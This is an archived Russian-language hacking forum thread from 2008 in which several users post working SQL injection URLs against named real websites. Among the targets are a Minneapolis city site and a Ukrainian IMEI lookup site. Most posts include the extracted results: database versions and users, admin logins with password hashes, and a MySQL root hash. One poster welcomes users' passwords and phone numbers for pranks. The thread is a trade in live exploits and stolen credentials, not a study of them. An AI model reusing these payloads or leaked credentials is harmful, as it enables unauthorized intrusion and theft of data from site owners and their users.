ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7121  
Старый 16.12.2008, 02:22
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

masternet От себя ихних же разрабов добавлю если можно

http://itdevotion.com/portfoliodetail.php?ID=-5+union+select+1,2,concat_ws(0x3a3a,username,passw ord),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21+from+tbl_user/*

version: 5.0.45-log::
user: ktunney_ktunney@web14.hosting365.ie
database:ktunney_rqop22i

admin::admin15613$1231fasd89h1a5g89
 
Ответить с цитированием

  #7122  
Старый 16.12.2008, 02:47
ImpLex
Познающий
Регистрация: 12.12.2008
Сообщений: 31
Провел на форуме:
141806

Репутация: 68
По умолчанию

pogreboc.com
Код:
http://www.pogreboc.com/girl.php?id=1+and+2=999+union+select+concat_ws(0x3a3a3a,id,name,pasw,mail),2+from+users_db--
кто внимательный, тот заметил, что вывод данных на глаз не виден. Но в сорсах есть)
 
Ответить с цитированием

  #7123  
Старый 16.12.2008, 12:04
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

http://www.annuaire-referencement-site.com/site.php?id=-1+union+select+1,2,unhex(hex(group_concat(column_n ame))),4,5,6,7,8,9,10,11,12,13,14,15,16+from+infor mation_schema.columns+where+table_name=0x745f61646 d696e--
поля админа
--------------
http://www.annuaire-referencement-site.com/site.php?id=-1+union+select+1,2,unhex(hex(group_concat(table_na me))),4,5,6,7,8,9,10,11,12,13,14,15,16+from+inform ation_schema.tables--
все таблы
----------------
http://www.epodsolar.com/site.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29--
4.1.20:epodsol_cm:epodsol_usr1@localhost
------------

Последний раз редактировалось masternet; 16.12.2008 в 12:12..
 
Ответить с цитированием

  #7124  
Старый 17.12.2008, 00:06
ImpLex
Познающий
Регистрация: 12.12.2008
Сообщений: 31
Провел на форуме:
141806

Репутация: 68
По умолчанию

Пока я тут, активность в данном разделе будет.
Код:
http://www.memfis.eu/ko7e7a/users.php?id=-32+union+select+1,aes_decrypt(aes_encrypt(convert(concat(id,0x3a,nick,0x3a,name,0x3a,email,0x3a,website),binary),0x71),0x71),3,4,5,6,7+from+users+limit+0,1--
 
Ответить с цитированием

  #7125  
Старый 17.12.2008, 00:13
ImpLex
Познающий
Регистрация: 12.12.2008
Сообщений: 31
Провел на форуме:
141806

Репутация: 68
По умолчанию

cpdvd.ru
Код:
http://www.cpdvd.ru/catalog.php?id=-4203+union+select+1,2,convert(concat(userid,0x3a,pass,0x3a,nam,0x3a,fam,0x3a,tel),%20binary),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+users+limit+0,1/*
Счастье для пранкера, столько паролей от юзеров, которые ещё и телефоны мобильные оставляют.
Ловите more 1 row sql inj jir.it
Код:
http://www.jir.it/main.php?langid=2+and+if(ascii(lower(substring((select+concat(userid,0x3a,username,0x3a,passwd)+from+administration+limit+0,1),1,1)))%3C255,(select%201%20from%20administration),567)=1/*
administrator:dc8df5c2eecdb245ead108cfb7352f8b
расшифровать хеш не удалось к сожалению.
 
Ответить с цитированием

  #7126  
Старый 17.12.2008, 01:30
The matrix
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345

Репутация: 573
Отправить сообщение для The matrix с помощью ICQ
По умолчанию

какой-то сайт мвд украинский попался
Код:
http://imei.org.ua/search.php?imei=123+union+select+concat_ws(0x3a,host,user,password),2,3,4,5,6,7,8+from+mysql.user+limit+0,1--
slava@localhost:imei
Код:
localhost:root:*2679BA488B8CF696590C7C1D51804387761ECA94
 
Ответить с цитированием

  #7127  
Старый 17.12.2008, 02:35
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от The matrix  
какой-то сайт мвд украинский попался
Код:
http://imei.org.ua/search.php?imei=123+union+select+concat_ws(0x3a,host,user,password),2,3,4,5,6,7,8+from+mysql.user+limit+0,1--
slava@localhost:imei
Код:
localhost:root:*2679BA488B8CF696590C7C1D51804387761ECA94
Вас посодят

PageRank: 6 тИЦ: 70

http://www.accuracy.org/article.php?articleId=-1+union+select+concat_ws(0x2f,version(),user(),dat abase())--

5.0.67-log/accuracy_w@209.68.4.96/accuracy_accuracy
 
Ответить с цитированием

  #7128  
Старый 17.12.2008, 14:32
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию

.us

http://laneuse.ci.minneapolis.mn.us
Код:
http://laneuse.ci.minneapolis.mn.us/closure.php?pn=-1+union+select+1,2,3,version(),5+from+users--
version: 5.0.45
Код:
http://laneuse.ci.minneapolis.mn.us/closure.php?pn=-1+union+select+1,2,3,concat_ws(login,0x3a,password),5+from+users--
Login : pass

jason:566cae743de1911e (MySQL type, расшифровать не удалось)

http://www.turkuaz.us
Код:
http://www.turkuaz.us:80/news_det.php?newsId=1333&catId=-32+union+select+1,version(),3,4--
version: 4.1.22
user: turkuaz-us@89.106.12.59
Подобрал единственную таблицу turkuazus.customers, но дальше подроб не пошел (...

http://www.mugama.com
Код:
http://www.mugama.com/profile.php?recordID=-1+union+select+1,version(),3,4,5,6--
version: 5.0.51a-community

Код:
http://www.mugama.com/profile.php?recordID=-1+union+select+1,concat_ws(user_name,0x3a,user_password),3,4,5,6+from+tbl_user--
admin:43e9a4ab75570f5b:admin

Последний раз редактировалось USAkid; 17.12.2008 в 14:36..
 
Ответить с цитированием

  #7129  
Старый 17.12.2008, 16:41
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Цитата:
http://www.crmchealth.org/thefoundation/news.php?id=-13+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versi on(),user(),database())/*
version: 5.0.30-Debian_1-log
user: mma@localhost
database: crmc
 
Ответить с цитированием

  #7130  
Старый 17.12.2008, 22:09
The matrix
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345

Репутация: 573
Отправить сообщение для The matrix с помощью ICQ
По умолчанию

слепая(Subquery returns more than 1 row)
Код:
http://www.nightnday.org/detail.php?list_id=1213%20and%20if(ascii(substring((select%20concat(version(),char(58),user())),1,1))>=1,(select%201%20union%20select%202%20),0)--
4.0.27-max-log:irentedit@68.178.232.59
pr=4
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ